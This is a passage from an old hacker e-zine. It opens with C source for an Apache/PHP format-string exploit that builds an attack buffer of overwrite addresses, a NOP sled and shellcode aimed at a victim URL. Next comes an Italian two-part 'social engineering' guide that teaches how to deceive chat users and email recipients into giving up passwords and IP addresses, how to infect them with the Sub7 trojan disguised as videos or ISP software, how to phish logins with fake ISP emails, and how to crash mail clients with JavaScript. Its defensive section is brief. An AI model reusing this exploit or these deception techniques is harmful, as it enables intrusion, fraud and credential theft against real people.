(optarg, "%x", &eip_address); break; case 's': sysptr = &systems[atoi (optarg)]; break; case 'u': url = optarg; parse_url (url, target); break; case '?': default : usage (); } } if (eip_address) sysptr->eip_address = eip_address; if (shellcode_address) sysptr->shellcode_address = shellcode_address; prepare_attack_buffer (attack_buffer, sysptr, url); // as of now write it out to stdout. later write it to a socket write (STDOUT_FILENO, attack_buffer, sizeof (attack_buffer)); } void prepare_attack_buffer (char *attack_buffer, struct system_type *system, char *url) { int dest_buffer_written; /* we keep track of how much bytes will be written in the destination buffer */ int ctr; char *address; char buf[25]; // temp buffer for %xd%n%xd%n%xd%n%xd%n // where x is precision int p1,p2,p3,p4; int nop_count; bzero (attack_buffer, 2000); sprintf (attack_buffer, "POST http://%s HTTP/1.0\nConnection: close\nUser-Agent: tirpitz\nContent-Type: multipart/form-data ", url); // mark strlen here. whatever we write after here appears in the buffer dest_buffer_written = strlen (attack_buffer); strcat (attack_buffer, "\x11\x11\x11\x11"); address = (char *)&system->eip_address; strncat (attack_buffer, address, 4); strcat (attack_buffer, "\x11\x11\x11\x11"); system->eip_address++; address = (char *)&system->eip_address; strncat (attack_buffer, address, 4); strcat (attack_buffer, "\x11\x11\x11\x11"); system->eip_address++; address = (char *)&system->eip_address; strncat (attack_buffer, address, 4); strcat (attack_buffer, "\x11\x11\x11\x11"); system->eip_address++; address = (char *)&system->eip_address; strncat (attack_buffer, address, 4); /* * we need to add %x corresponding to the number of pops we need to reach * our embedded addresses we defined above */ for (; system->offset; system->offset--) strcat (attack_buffer, "%x "); p1 = calculate_precision ((system->shellcode_address & 0x000000ff), system->already_written); p2 = calculate_precision ((system->shellcode_address & 0x0000ff00) >> 8, system->already_written); p3 = calculate_precision ((system->shellcode_address & 0x00ff0000) >> 16, system->already_written); p4 = calculate_precision ((system->shellcode_address & 0xff000000) >> 24, system->already_written); sprintf (buf, "%%%dd%%n%%%dd%%n%%%dd%%n%%%dd%%n", p1, p2, p3, p4); strcat (attack_buffer, buf); ctr = strlen (attack_buffer); dest_buffer_written = ctr - dest_buffer_written; dest_buffer_written += PHP3_WARNING; // dest_buffer_written now contains the number of bytes the PHP_WARNING and then the 8 4 byte values and then the %x to pop off the stack attack_buffer += ctr; nop_count = BUF_LEN - dest_buffer_written - system->shellcode_len; memset (attack_buffer, NOP, nop_count); /* * Add our shellcode at last */ attack_buffer += nop_count; strcat (attack_buffer, shellcode); strcat (attack_buffer, "\n"); strcat (attack_buffer, "Content-Length: 1337\n\n"); } void usage (void) { int ctr; fprintf (stderr, " Apache/PHP xploit\n"); fprintf (stderr, " Field Marshal Count August Anton Wilhelm Neithardt von Gneisenau\n"); fprintf (stderr, " for the r00tcrew\n"); fprintf (stderr, " All rights reserved\n"); fprintf (stderr, "\nUsage:\n"); fprintf (stderr, "phpxpl -u url -s systype [ -e eip address ] [ -h shellcode address ]\n\n"); fprintf (stderr, "url: the complete url including FQDN and script on the server\n"); fprintf (stderr, " www.victim.com/info.php3\n"); fprintf (stderr, "available systypes:\n"); for (ctr = 0; systems[ctr].name; ctr++) fprintf (stderr, "%d. %s\n", ctr, systems[ctr].name); fprintf (stderr, "eip address: the address which the xploit overwrites with buffer address (specify thus 0xbfff9c30) \n"); fprintf (stderr, "shellcode address: the address which points to the NOPs (specify thus 0xbfff962c)\n"); fprintf (stderr, "\n"); exit (1); } void parse_url (char *url, char *target) { char *ptr; strcpy (target, url); if (!(ptr = index (target, '/'))){ fprintf (stderr, "invalid url. specify the script name on the target server too\n"); exit (1); } *ptr = '\0'; } /* * addr_byte contains the byte we need to write out. for example: 2c in * 0xbfff962c, then 96, ff and bf. */ int calculate_precision (unsigned int addr_byte, int already_written_init) { static int already_written = 0; int tmp; if (!already_written) already_written = already_written_init; while (addr_byte < already_written) addr_byte += 0x100; tmp = addr_byte - already_written; already_written = addr_byte; return tmp; } [E4M] |-----------------------------------------------------------------| |Art. N° <8> : "Guida al Social Engineering... Parte 1" di M3xican| |-----------------------------------------------------------------| /******************************************************************** GUIDA AL SOCIAL ENGINEERING APPLICATO ALLE CHAT & ALLE EMAIL v 1.0 Autore: M3xican (del Team di Napoli Hak) Email: ilmessicano@inwind.it ICQ: 104241710 sito: http://napolihak.da.ru ********************************************************************/ [INDICE]: 1° DISCLAIMER (per newbe & sbirri) -| 2° DISCLAIMER (per wannabe & hacker) | 1) IL SOCIAL ENGINEERING IN GENERALE | 2) DI COSA HO BISOGNO | soc_eng1.txt 3) SOCIAL ENGINEERING APPLICATO ALLE CHAT | 4) FARE MALE QUALCUNO VIA CHAT -| 5) SOCIAL ENGINEERING APPLICATO ALLE EMAIL -| 6) FARE MALE QUALCUNO VIA EMAIL | 7) COME DIFENDERSI | soc_eng2.txt 8) GLOSSARIO | 9) NOTE FINALI -| --------------------------------------------------------------------- [1° DISCLAIMER (per newbes & sbirri)]: Questa guida è stata realizzata per aiutare le persone, e in particolare gli utenti inesperti, a riconoscere tentativi di truffa ed aggressione da partre di altri, pertanto gli esempi di tecniche di attacco presenti devono considerarsi come puri esempi atti al riconoscimento dei tali e non come insegnamenti al danneggiamento altrui. L'autore (il M3xican) non si assume nessuna responsabilità dell'uso errato e/o dannoso che verrà fatto delle informazioni presenti in questa guida. --------------------------------------------------------------------- [2° DISCLAIMER (per wannabes & hackers)]: Questa guida è stata realizzata per aiutare le persone che sono infastidite da stupidi lamer via chat o via email, la sto scrivendo perchè mi sono arrivate molte email di utenti in difficoltà. Se ritieni che l'argomento sia lamer, che io sia un lamer, che queste sono tutte cazzate, che tu avresti saputo scrivere in maniera più semplice, più chiara, più bella, non me lo venire a dire via email (sprechi tempo, lo so già che tu 6 un genio...), smetti di leggere e elimina il file, nessuno ti ha chiesto di scaricarlo. --------------------------------------------------------------------- [1) IL SOCIAL ENGINEERING IN GENERALE] Social Engineering può essere tradotto con ingegneria sociale, ovvero la scienza che si occupa dei rapporti con gli altri... Il social engineering, infatti è "l'arte" che permette di ottenere informazioni e/o compiere azioni che normalmente sono riservate a pochi. Come si realizza questo? Semplice, spacciandosi per uno di quei pochi! In pratica il social engineering si basa sulla menzogna, si contatta una vittima, ci si finge qualcun altro che in qualche modo potrebbe essere, od è, legato alla vittima e si prova ad ottenere informazioni e/o a compiere azioni sotto la falsa identità. Ecco un esempio: Se telefono a un tizio e gli chiedo di darmi il numero della sua carta di credito, lui come minimo mi ride in faccia e mi riempie di insulti... ma se invece chiamo il tizio e mi spaccio per un impiegato della sua banca (meglio ancora se realmente esistente), dicendo che dobbiamo effettuare un operazione temporanea di transito del suo capitale a causa di problemi interni e che abbiamo bisogno del suo numero per risolverli... bhè, al 90% otterremo quello che vogliamo (dipende sempre dall'altra persona, e da quanto riusciamo ad essere convincenti). Logicamente il social engineering non è una scienza esatta, se pretendete di mandare una fake email alla casa bianca dicendo di essere Bush e di voler sapere i codici per attivare una guerra nucleare perchè ve li siete scordati, non credo che verrete tanto creduti... Ricordate sempre la buona riuscita dell'operazione di social engineering si basa sempre su due fattori: 1- La nostra abilità e furbizia. 2- La demenza della vittima =) Spero che sia chiaro che l'esempio di prima era solo un esempio, qui non imparerete a fottere i numeri di carta di credito (anche perchè se lo sapessi fare non starei qui a scrivere sto manuale, ma su di una spiaggia con 1 bonazza in bikini vicino... =)! Bene, finita la teoria iniziale, passiamo a qualcosa di più pratico. --------------------------------------------------------------------- [2) DI COSA HO BISOGNO] Allora, per poter comprendere appieno questa guida è necessario avere conoscenze basi di HMTL & JAVASCRIPT, alcuni esempi che farò saranno interamente basati su questi due linguaggi, benchè cercherò di spiegarli in modo da farli capire anche a un dummie la conoscenza di essi è indispensabile per chi vuole operare da se e non limitarsi a eseguire un copia e incolla dei miei listati. Per quanto riguarda i programmi, c'è bisogno di un buon trojan tipo sub7 e di un buon fake mailer/bomber tipo Xmass2000 entrambi li potete trovare su http://napolihak.da.ru . Inoltre è necessario un requisito personale, che purtroppo nessuno vi può dare, la rapidità di pensiero e di organizzazione. La prima è necessaria per sapersela cavare in ogni situazione imprevista, la seconda per saper pianificare al meglio le nostre azioni. --------------------------------------------------------------------- [3) SOCIAL ENGINEERING APPLICATO ALLE CHAT] Il social engineering nelle chat può essere effettuato per diverse ragioni: - Venire a conoscenza di quante più informazioni sulla vittima per poter essere in grado di compilare una word list con delle password che lui potrebbe usare (per utilizzarla da qualche parte). - Sapere l'indirizzo email della vittima. - Ottenere l'IP della vittima. - Infettare la vittima con un trojan. Ma vediamo le cose con calma. Per ottenere quante più informazioni possibili su di una vittima ci sono diversi modi. Il più semplice, dal punto di vista della realizzazione, è quello di chattare con la vittima, mantenendo il dialogo sempre su di un tono molto tranquillo... Mi spiego meglio: se contattiamo un tizo in chat e senza dargli il tempo di parlare gli chiediamo, nome, cognome, città, hobby, ecc... difficilmente otterremo una risposta. Ma se con lui instauriamo un rapporto di amicizia reciproca e magari salviamo ogni volta la conversazione che abbiamo avuto, alla fine saremo in grado di stilare una word list. Questa operazione può richiedere da alcuni giorni ad alcune settimane, e non sempre porta a buoni risultati, ma in genere è la più sicura, in quanto la vittima, se siete abili, non potrà mai sospettare nulla di voi, per qualsiasi cosa gli accada... =) Questa tecnica ha un problema di fondo, si basa sul dialogo, e considerando che in genere si cerca di fare del male a persone con cui non si hanno buoni rapporti... è un pò difficile pretendere di minacciare uno di morte e il giorno dopo, come per magia, pretendere che chatti con voi d'amore e d'accordo... In questo ci può aiutare il social engineering. Ci sono diverse tecniche per riuscire a chattare con la vittima: 1- Il modo più semplice per chattare con un uomo qual'è? Semplice... fingere di essere una donna! Questa tecnica permette nel 99% dei casi la buona riuscita dell'obbiettivo preposto. Per farlo è necessario crearsi nella chat un nick di donna (se si usano chat basate su programmi tipo C6. altrimenti è sufficiente collegarsi con un nick di donna nelle chat basate sul web/java), e contattare la vittima. Il primo grande problema che si incontra utilizzando questa tecnica, è quello che non appena si accede in chat con un nick di donna si viene bombardati da richieste di altri uomini (richieste di sesso x di più!). Per questo è indispensabile rendersi indisponibili a chattare con gli altri (sempre se si usa un programma di chat tipo C6, in cui cioè, è possibile selezionare una opzione simile) per potersi concentrare sul proprio obbiettivo. La prima volta che usai questa tecnica non pensai a rendermi indisponibile (stavo su C6), e appena entrai in una stanza (che era una stanza normalissima, una di quelle fatte proprio da C6, non dagli utenti) fui contatto da 15 uomini e dopo poco pure da una lesbica... siccome non capivo più un cazzo perchè avere 16 finestre aperte sullo schermo non è una cosa molto gestibile... dovetti chiudere C6! Un altro problema è che la vittima potrebbe essere uno dei milioni di malati sessuali che affolano le chat, che considerano la chat come una cosa erotica e basta, in tal caso appena lo contatterete lui vi chiederà di fare sesso... in questi casi io chiudo e passo ad altre tecniche, ma se voi avete lo stomaco di fare sesso con un uomo per cercare di ottenere qualche password... bè, auguri! Se invece la vittima è disposta almeno nelle prime volte al dialogo, bhè, dateci dentro e cercate di ottenre quante più informazioni potete, magari la prima volta fate una specie di botta-risposta per conoscerlo, in pratica proponete che ognuno parli di se. Abbiate cura al termine della conversazione di salvarla per poterla osservare con cura in seguito. Inoltre prima di un'azione del genere preparate una scheda su di voi, in modo da non creare sospetti nel caso non vi venisse al momento cosa inventare su una determinata domanda fatta dalla vittima, per essere ancora più convincenti mandategli anche una vostra foto... logicamente non vostra =) ma di una ragazza con cui avete chattato, in quanto deve essere credibile (se mandate una foto presa dal sito di pamela andersson non penso vi crederà... =). 2- Un altro metodo è quello di diventare "colleghi" della vittima. Ovvero prendiamo il caso che il bastardo sia uno che va nelle chat a dire cose tipo "meridionali di merda, terroni, ecc..", bhè... persone così non sono altro che ignoranti e stupide, quindi degli ottimi bersagli per il social engineering =) Come ci dobbiamo comportare noi? Semplice, assecondiamolo, comportiamoci come lui, diamo forza alle sue menate. Poi contattiamolo in privato e iniziamo a chattarci. Questa è una tecnica che può ferire un pò nell'orgoglio, in quanto io, da napoletano, non direi nemmeno se costretto con una pistola alla tempia "terroni di merda", ma basta pensare che questo piccolo sacrificio con buona probabilità ci permetterà di fare davvero del male al coglione, che tutto risulta più facile... Questa tecnica è un pò rischiosa, in quanto alle volte ci si fa scoprire dalla vittima in quanto si usa un espressione o si dice qualcosa che uno come lui non direbbe mai (se ad esempio vi scappa un'espressione napoletana tipo "azz'" mentre chattate con quello che attacca i terroni, vi fate scoprire). 3- Una evoluzione della tecnica precedente è quella di utilizzare due nick contemporaneamente nella stessa chat dove è presente la vittima. Tale tecnica può essere realizzata facilmente in chat basate sul web (tipo quella di yahoo, ecc..) aprendo due volte contemporaneamente la stessa pagina (quindi eseguendo due volte il browser) e entrando con due nick diversi. Nelle chat basate su programmi c'è bisogno di un piccolo accorgimento. Prendiamo ad esempio C6, se apriamo il programma e poi tentiamo di riaprirlo non succede niente, in quanto il programma è già in esecuzione, ma se copiamo la cartella in cui è contenuto in un altra cartella e da lì eseguiamo il programma, verrà aperto una seconda volta il programma, e quindi potremmo connetterci con due nick contemporaneamente =) (questo trucco mi è stato svelato da Nemesys, che ringrazio). Ora che abbiamo due nick possiamo guadagnare molto più facilmente la fiducia della vittima. Ad esempio con un nick lo attacchiamo, riempiendolo di parole, sfottendolo, offendendolo, e con l'altro lo difendiamo, per poi andarlo a contattare in privato, magari per commentare la demenza della persona che lo attaccava (sempre voi). Logicamente queste 3 tecniche servono solo per farvi conoscere la persona, il dialogo poi lo dovete impostare voi a seconda dei casi, non esiste una regola generale su come comportarsi. L'importante è sempre di immergersi nel personaggio che si sta fingendo di essere, in modo da non tradirsi mai. Una volta che siete riusciti a chattare con la vittima non dovrebbe risultare difficile ottenere la sua email, soprattutto se si utilizza un nick di ragazza e si esegue la parte seguente: ci si collega, si contatta la vittima, ci si parla un poco, e dopo un paio di minuti all'improvviso si dice che per un motivo qualsiasi dovete andare subito, ma... ma, ditegli anche che volete restare in contatto con lui, e che volete la sua email, se lui è diffidente dategli una vostra creata appositamente per le operazioni di social engineering e ditegli di contattarvi lì (abbiate cura nella scelta dell'email, se il vostro nick è ad es.: bella21, l'email non potrà essere alberto_rossi@tin.it). Ottenere l'IP della vittima è un operazione semplicissima, basta collegarsi con un nick di ragazza, chattare 1 pò e poi mandargli la vostra foto (quella falsa, di cui ho parlato prima), che lui sicoramente vorrà. Logicamente per fare ciò c'è bisogno di una chat che permette lo scambio di files, altrimenti niente! Non appena la foto comincerà ad essere inviata, aprite una finestra MS-Dos (Avvio-->Esegui-->command oppure doppio clik sull'icona di ms-dos presente in avvio) e digitate il seguente comando: c:\>netstat -an Tale comando visualizzerà tutte le connessioni attive al momento, e quindi anche l'IP della vittima. Se volete maggiori informazioni riguardo l'uso di netstat potete scaricare la guida su di esso sempre su http://napolihak.da.ru nella sezione MANUALI-->HACKING Di come infettare la vittima con un trojan ne parlerò tra breve nella sezione (4). Tutte le tecniche illustrate sopra sono rivolte contro vittime maschi, ma se vogliamo attaccare una ragazza? Bhè... il discorso diventa molto più complicato, infatti (almeno su C6) le ragazze presenti, non ti rispondono nemmmeno se dici di essere il Papa... perchè nel 90% dei casi stanno impegnate (a fare...). Comunque provate sempre, la speranza è l'ultima a morire. --------------------------------------------------------------------- [4) FARE MALE QUALCUNO VIA CHAT] Il modo per riuscire a colpire col maggior danno possibile un utente di internet qual'è? Semplice, infettarlo con un trojan! Tutti gli attacchi di questo modo su IP al massimo gli fanno crashare il pc, un trojan è (quasi) per sempre e dà poteri pressapoco illimitati sul pc vittima! Qui non spiegherò come usare un trojan, ma come infettare una vittima via chat. La prima regola del social engineering è quella di fingere, camuffare e mentire sempre. Questo cosa vi fa venire in mente...? Per poter far eseguire un trojan alla vittima bisogna convincerla che sia un qualcosa di totalmente diverso da una cosa dannosa, anzi, che è una cosa che gli può interessare. Ci sono due casi principali, quando si vuole infettare qualcuno: 1) La persona che si vuole infettare è un perfetto sconosciuto. 2) La persona che si vuole infettare ci da la sua fiducia (poichè siamo riusciti a guadagnarla grazie alle tecniche spiegate nella sezione (3). Il primo caso può essere più semplice in determinate condizioni, ovvero quando si va nelle chat in cui si scambia materiale pornografico. Entrare nella chat con la seguente frase è il 90% del lavoro: "Chi vuole scambiare un filmato con delle foto?" quanto prima verrete contatti da più persone interessate allo scambio (i malati sono tanti x fortuna =). E cosa gli passeremo noi? Semplice, il server del trojan, ovvero la parte del trojan che deve eseguire la vittima. In questo caso però dovremmo sfruttare l'opzione di sub7 che permette di modificare l'icona del server per renderla uguale a quella dei filmati .avi . Logicamente il file sarà sempre .exe, per questo nel caso la vittima ci chieda spiegazioni potremmo dire che è un filmato realizzato con 1 programma per il ritocco dei filmati, che produce file eseguibili per poterli rendere utilizzabili da tutti... questa è una mega palla, ma secondo voi chi si fa infettare da un trojan non è uno che crede ancora a Babbo Natale? =) Quando invece si vuole infettare un utente "normale" bisogna considerare bene la situazione, non esiste una regola precisa, bisogna improvisare a seconda della situazione, non so, magari dicendo alla vittima che si è uno sviluppatore di software e che gli si vuole fare provare la propria ultima opera... Il secondo caso necessita del lavoro di fraternizzazione con la vittima spiegato nella sezione (3), ma garantisce risultati quasi sicuri. Una volta ottenuta la fiducia della vittima potrete sempre fargli credere quello che volete. Ad esempio se una vostra amica vi manda un giochino via email, dicendo che è molto carino, voi non lo provate? =) Logicamente sta a voi creare la situazione più favorevole e la scusa più credibile. In entrambi i casi impostate il server del trojan in modo che produca un messaggio di errore, così poi potrete usare la scusa che si è danneggiato durante il collegamento. Per quanto riguarda i possibili attacchi DoS che possono essere effettuati su di un IP verrà realizzata in futuro una guida (poichè l'argomento è vasto e non completamente inerente con l'argomento di questa guida), pertanto per ora non vi anticipo niente. Invece per cosa fare con l'email della vittima leggevi le sezioni (5) e (6) presenti nel file soc_eng2.txt ============> LA GUIDA CONTINUA NEL FILE 'soc_eng2.txt' ============> |-----------------------------------------------------------------| |Art. N° <9> : "Guida al Social Engineering... Parte 2" di M3xican| |-----------------------------------------------------------------| /******************************************************************** GUIDA AL SOCIAL ENGINEERING APPLICATO ALLE CHAT & ALLE EMAIL v 1.0 Autore: M3xican (del Team di Napoli Hak) Email: ilmessicano@inwind.it ICQ: 104241710 sito: http://napolihak.da.ru ********************************************************************/ [INDICE]: 1° DISCLAIMER (per newbe & sbirri) -| 2° DISCLAIMER (per wannabe & hacker) | 1) IL SOCIAL ENGINEERING IN GENERALE | 2) DI COSA HO BISOGNO | soc_eng1.txt 3) SOCIAL ENGINEERING APPLICATO ALLE CHAT | 4) FARE MALE QUALCUNO VIA CHAT -| 5) SOCIAL ENGINEERING APPLICATO ALLE EMAIL -| 6) FARE MALE QUALCUNO VIA EMAIL | 7) COME DIFENDERSI | soc_eng2.txt 8) GLOSSARIO | 9) NOTE FINALI -| --------------------------------------------------------------------- [5) SOCIAL ENGINEERING APPLICATO ALLE EMAIL] Il social engineering applicato alle email è sicuramente più difficile nella realizzazione di quello applicato alle chat, ma se svolto con cura permette di ottenere migliori risultati (in genere...). Lo scopo principale del social engineering applicato alle email è quello di ottenere una password dell'account dell'utente, del suo sito personale, ecc.. Per fare ciò ci sono diverse tecniche: 1- Ci si crea un indirizzo email dello stesso dominio della vittima, con nick tipo serv_assist, assistenza, marketing, sevizio.assistenza ecc... In pratica se la vittima ha un indirizzo ciccio@isp.it noi dobbiamo andare a crearci un indirizzo tipo serv_assist@isp.it . Fatto ciò scriviamo una bella email alla vittima in cui diciamo più o meno così: >Gentile Utente, > A causa di problemi tecnici alcune informazioni sui nostri utenti sono state smarrite. > Per poterle ripristinare abbiamo bisogno del suo login e della sua password, pertanto la preghiamo di > inviarceli a questo indirizzo: serv_assist@isp.it > Certi della sua collaborazione la ringraziamo. > > Il Responsabile Tecnico isp.it > Ing. Mario Monti Logicamente potete inventare scuse meglio articolate per rendere il tutto più credibile. Però... questa tecnica, ha possibilità di riuscita tendente a 0... Bisogna solo essere così fortunati da trovare un utente che ha acquistato il suo primo pc un giorno prima (che tralatro deve essere pure un pò idiota...). Io qui l'ho citata per non tralasciare niente, ma vi sconsiglio vivamente di usarla, anche perchè così rischiate solo di mettere in allerta la vittima, che riconsocerà molto più facilmente eventuali tentativi di social engineering. 2- Questa tecnica richiede una maggiore preparazione, ma garantisce probabilità di riuscita nettamente superiori alla prima. La prima cosa che dobbiamo fare è studiare il provider che fornisce l'email alla vittima. Facciamo sempre l'esempio che la vittima abbia come indirizzo cicco@isp.it . Noi ci colleghiamo al sito di isp.it e preleviamo i loghi in esso presenti, se magari ci creiamo un account su di esso e aspettiamo che ci venga inviata un email da loro (in genere ogni ISP ha un servizio di newsletter abbinato alla casella email). Terminata questa fase di studio prepariamo un email che sia quanto più familiare al sito, e alle email inviate. Ad esempio, se l'isp invia email mettendo in alto una fascia verde con all'interno il suo logo, noi ripeteremo esattamente il procedimento visto nel punto 1 ma aggiungendo i particolari grafici appropiati. Per fare ciò è necessario conoscere l'HTML in quanto bisognerà creare una pagina HTML per poi passare tutto il codice in un email. 3- La terza tecnica è una seccessiva evoluzione della seconda. In pratica è richiesta la stessa preparazione con una piccola aggiunta alla fine... La piccola aggiunta consiste nell'inserimento di un form, ovvero di due campi in cui la vittima deve inserire il proprio login e password e cliccare poi sul pulsante invia. L'email si presenterà esattamente come quella spiegata nel punto 2 soltanto che l'aggiunta del form la farà sembrare ancora più autentica. Però sorge un problema... per utilizzare un form è necessario poter disporre di un server che gestisca script cgi, il che è praticamente impossibile nei servizi gratuiti, quindi o sborsate per un server, o... vi affidate a qualche servizio di gestione form gratuito tipo Bravenet (www.bravenet.com). Una volta registrati al servizio vi verrà fornito il codice HTML che dovrete inserire nel vostro sito. Però il codice che vi verrà fornito visualizzerà la loro grafica e i loro pulsanti, e questo a noi certo non va bene... per questo bisogna modificarlo e renderlo simile a quello sottostante.
Login:
Password:

(le xxxxxxxx sono il vostro numero identificativo di bravenet) I primi due campi input non devono essere modificati, in quanto sono quelli che bravenet usa per riconoscervi, i secondi due sono quelli che definiscono i campi che la vittima deve compilare, l'ultimo è quello che definisce il pulsante invia. Il codice HTML soprastante può essere inserito in tabelle e contornato da elementi grafici (ad esempio si può usare come pulsante invia l'immagine utilizzate da isp.it per i suoi pulsanti). Se magari nel sito di isp.it è presente una mascherina per accedere alla posta via web, possiamo copiare il codice che ci interessa dalla loro pagina e modificare solo i campi del form inerenti all'invio dei dati (che non dovranno più essere usati per accedere all'area utente, ma che ci dovranno essere inviati). Il tutto sta nella vostra capacità realizzativa. Tale tecnica è senza dubbio la migliore e la più efficace in quanto non richiede di possedere un indirizzo email appropriato, poichè la vittima ci invierà i dati tramite il form presente nell'email. Quindi in questo caso dovremmo utilizzare un programma tipo Xmass2000 con cui inviare la nostra fake email basata sull'HTML preparato. Sia la tecnica 2 che la 3 necessitano di immagini, tali immagini possono essere prelevate dal sito proprietario dell'email della vittima (negli esempi fatti isp.it) e caricate su un qualsiasi server gratuito (ormai ogni ISP offre uno spaio web gratuito) per poterle poi utlizzare quando si vuole ed evitare che eventuali aggiornamenti del sito da cui sono state prelevate compromettano il nostro operato. Se infatti ad esempio il logo di isp.it ha indirizzo http://isp.it/img/loghi/logo_main.gif e noi utilizziamo questo indirizzo nel nostro codice HTML e libero lo cambia per qualsiasi motivo, bhè... il nostro piano fallisce ancora prima di cominciare! --------------------------------------------------------------------- [6) FARE MALE QUALCUNO VIA EMAIL] Ci sono diversi modi di fare male qualcuno via email, ma anche qui il modo che comporta maggior danno è quello di riuscire a infettarlo con un trojan. Molti lamer inviano fakemail a indirizzi vari con un file .exe allegato, magari lasciando anche il testo vuoto, sperando nella curiosità/stupidità di chi riceve l'email. Ma questo è un sistema che ormai non funziona nemmemo per sbaglio... Quindi per poter sperare che la vittima esegua il nostro bel server dobbiamo affidarci ancora una volta al social engineering. A mio parere la tecnica più affidabile è la seguente: Inviamo una fake email come spiegato nella seconda tecnica nella sezione (5) alla vittima spacciandoci per l'ISP che gestisce il suo indirizzo con il seguente testo: >Gentile Utente, > Siamo lieti di informala che da oggi è possibile utilizzare il nuovo programma di connessione di > isp.it. > Il nuovo programma vi permetterà di ottenere connessioni più sicure e più stabili. > Tale programma le è stato allegato a questa email, per poterlo utilizzare è necessario eseguire > il file allegato e seguire i semplici passi dell'installazione. > Per eventuali dubbi o domande inviate un email a assist_tecn@isp.it > > > Il Responsabile Tecnico isp.it > Ing. Mario Monti (l'indirizzo assist_tecn@isp.it deve essere inventato, di certo non vi interessa conoscere le lamentele delle vittime =) Come allegato dell'email inseriremo il server del nostro sub7 avendo cura di modificare l'icona con quella del vero programma di connessione dell'ISP. Magari per rendere la cosa quanto meno sospetta possiamo far generare un messaggio di errore al server di sub7 in modo che l'utente creda che ci sia stato qualche problema. Per ottenere le icone dei vari ISP è sufficente trovare un cd di connessione a internet che viene distribuito nei negozi, per strada, nei giornali. Tutti gli ISP distribuisco il proprio CD gratuitamente da qualche parte. Se proprio non riuscite a trovarlo, provate a chiedere a qualche vostro amico se utilizza quel determinato ISP. Se anche questa ricerca risulta infruttuosa, provate a vedere sul sito dell'ISP se è possibile scaricare il loro programma di connessione, in genere dopo che ci si è registrati si ha tale possibilità. I trojan non sono l'unico metodo che si ha per nuocere a qualcuno, infatti è possibile utilizzare anche un semplice linguaggio chiamato javascript, che va ad interagire con le pagine HTML per aumentarne l'interattività con l'utente... questo nelle intenzioni iniziali, ma ogni cosa può sempre essere usata in diversi modi. =) Se ad esempio nell'email (basata sempre su un HTML) alleghiamo un codice tipo questo: onLoad="infinito_al()"> ..... ..... ..... ..... Non appena la vittima selezionerà il messaggio verranno generati infiniti box di alert (quelli con l'icona del punto esclamativo nero nel triangolo giallo) con la scritta 'PIANGI BaStArDo!!!!' che obbligheranno l'utente a spegnere il pc, infatti anche la combinazione CTRL+ALT+CANC non può nulla... La cosa più bella è che il messaggio non può essere cancellato se non quando il javascript ha terminato il suo compito, ovvero mai... quindi ogni volta che il messaggio viene selezionato si è costretti a riavviare il pc, quindi pensate cosa succede se si inviano 20, 30 messaggi uguali, se l'utente non sa come potersi difendere deve solo cancellare il suo client di posta, in quanto ogni volta che vi accede almeno uno viene selezionato automaticamente. Un altro attacco simile. ma molto più crudele può essere il seguente: ..... ..... ..... ..... In questo caso non appena la vittima selezionerà l'email verranno aperte infinite finestre a http://napolihak.da.ru il che come minimo farà cadere la connessione, e come massimo farà crashare il pc vittima. Grazie ad un comando javascript si può anche formattare il pc della vittima, ma non ho intenzione di spiegarlo qui, sarebbe un informazione troppo preziosa per i lamers. Entrambe gli attacchi basati su javascript non funzionano su servizi di webmail, ovvero su con quelli account che si consultano direttamente da internet, tipo yahoo. --------------------------------------------------------------------- [7) COME DIFENDERSI] Questa guida, come detto nel primo disclaimer, è stata scritta per insegnare gli utenti inesperti a difendersi dagli attacchi lamer. Tutti gli attacchi descritti sono stati spiegati per poterli facilmente individuare. In questa sezione però vi darò altri consigli per poterli prevenire e/o annullare. Per quanto riguarda le chat, c'è poco da dire, la diffidenza è l'unica arma, che però se accompagnata da un buon firewall e da un buon antivirus assicura una discreta sicurezza. Logicamente il mio consiglio è quello di non eseguire mai file che ci vengono date da persone in chat, a meno che non siano nostri amici (reali) di lunga data. Per quanto riguarda le email il discorso cambia. Infatti oltre al solito suggerimento di cestinare all'istante le email di provenienza sconosciuta contenenti allegati .exe e di utilizzare un antivirus ci sono altri accorgimenti per prevenire attacchi basati su script allegati alle mail. Se infatti si subisce un attacco basato su un javascript basta riavviare il pc, eseguire Internet Explorer e andare in OPZIONI-->PROTEZIONE-->PERSONALIZZA LIVELLO e disattivando controlli e plug-in Active-X e esecuzione script. Poi riavviare Outlook e selezionare il messaggio "infetto", questa volta però non accadrà niente e potremo cancellarlo liberamente. Un consiglio generale è anche quello di rinominare i files comando più pericolosi come i seguenti: format.com --> form.com deltree.exe --> dt.exe tali files sono contenuti nella cartella windows\command\ e possono essere rinominati col seguente comando: c:\>rename comando.xxx nuovo_nome.xxx dove xxx è l'estensione del file. In tal modo eventuali tentativi di formattarci il disco rigido non avranno successo in quanto nello script ci sarà una riga di questo genere: comando_js("format c: /q /autotest >> NULL") che otterrà come risultato solo un misero "comando o nome di file non valido" =) --------------------------------------------------------------------- [8) GLOSSARIO] -Script CGI(Common Gateway Interface):, script che permettono al client di comunicare con il server per determinate azioni più o meno complesse (come ad esempio un operazione di login oppure una ricerca di un termine). -Fake mail: email fasulla, che nasconde l'identità di chi la manda sostituendola con un'altra inventata da chi la invia. -ISP: Internet Service Provider, ovvero fornitore di servizi internet, sono quelle società che offrono collegamenti a internet e servizi connessi come ad esempio una casella email, uno spazio per il proprio sito, ecc... --------------------------------------------------------------------- [9) NOTE FINALI] Per chi volesse discutere (civilmente) degli argomenti trattati in questa guida è possibile contattarmi tramite i recapiti indicati nella parte iniziale del file e tramite il forum del sito http://napolihak.da.ru . Mi raccomando tenete d'occhio il sito tra breve altre nuove guide! M3xican |---------------------------------------------------| |Art. N° <10> : "Netstat" di Tricker (trad. M3xican)| |---------------------------------------------------| *%* _.|~~|._ | ~~~~)\~~~/ /~~~~~| |~~| /~~/ |~~~~~~~/ | ~~~~) *%* *%* |__ __| | @ / | | | /~~~ | |/ / | |~~~~~ | @ / *%* *%* | | | |\ \ | | | | | < | |_____ | |\ \ *%* *%* |__| |_| \_\ | | | \____ | |\ \ | _____\ |_| \_\ *%* *%*%*%*%*%*%*%*%*%*%*/~ ~\ \_____/ |__| \__\ | |_____ *%* *%*~~~~~ * TrickSoft.net * |______/ *%*%*%*%*%* *%*%*%*%*%*%*%*%*%*%*%*%*%*%**%*%*%*%*%*%* (Cadtrick@hotmail.com) - Data:giugno,01,2000 ---------------- Info conatatti: ---------------- Scritto da: TriÇker (con alcune lievi modifiche di R a v e N) Email:Cadtrick@hotmail.com ICQ:40884568 AIM:zTrickerz Web:http://tricksoft.net TRADOTTO DAL: M3xican (ilmessicano@inwind.it) web:http://napolihak.da.ru Titolo: informazioni su IP e porte usando Netstat 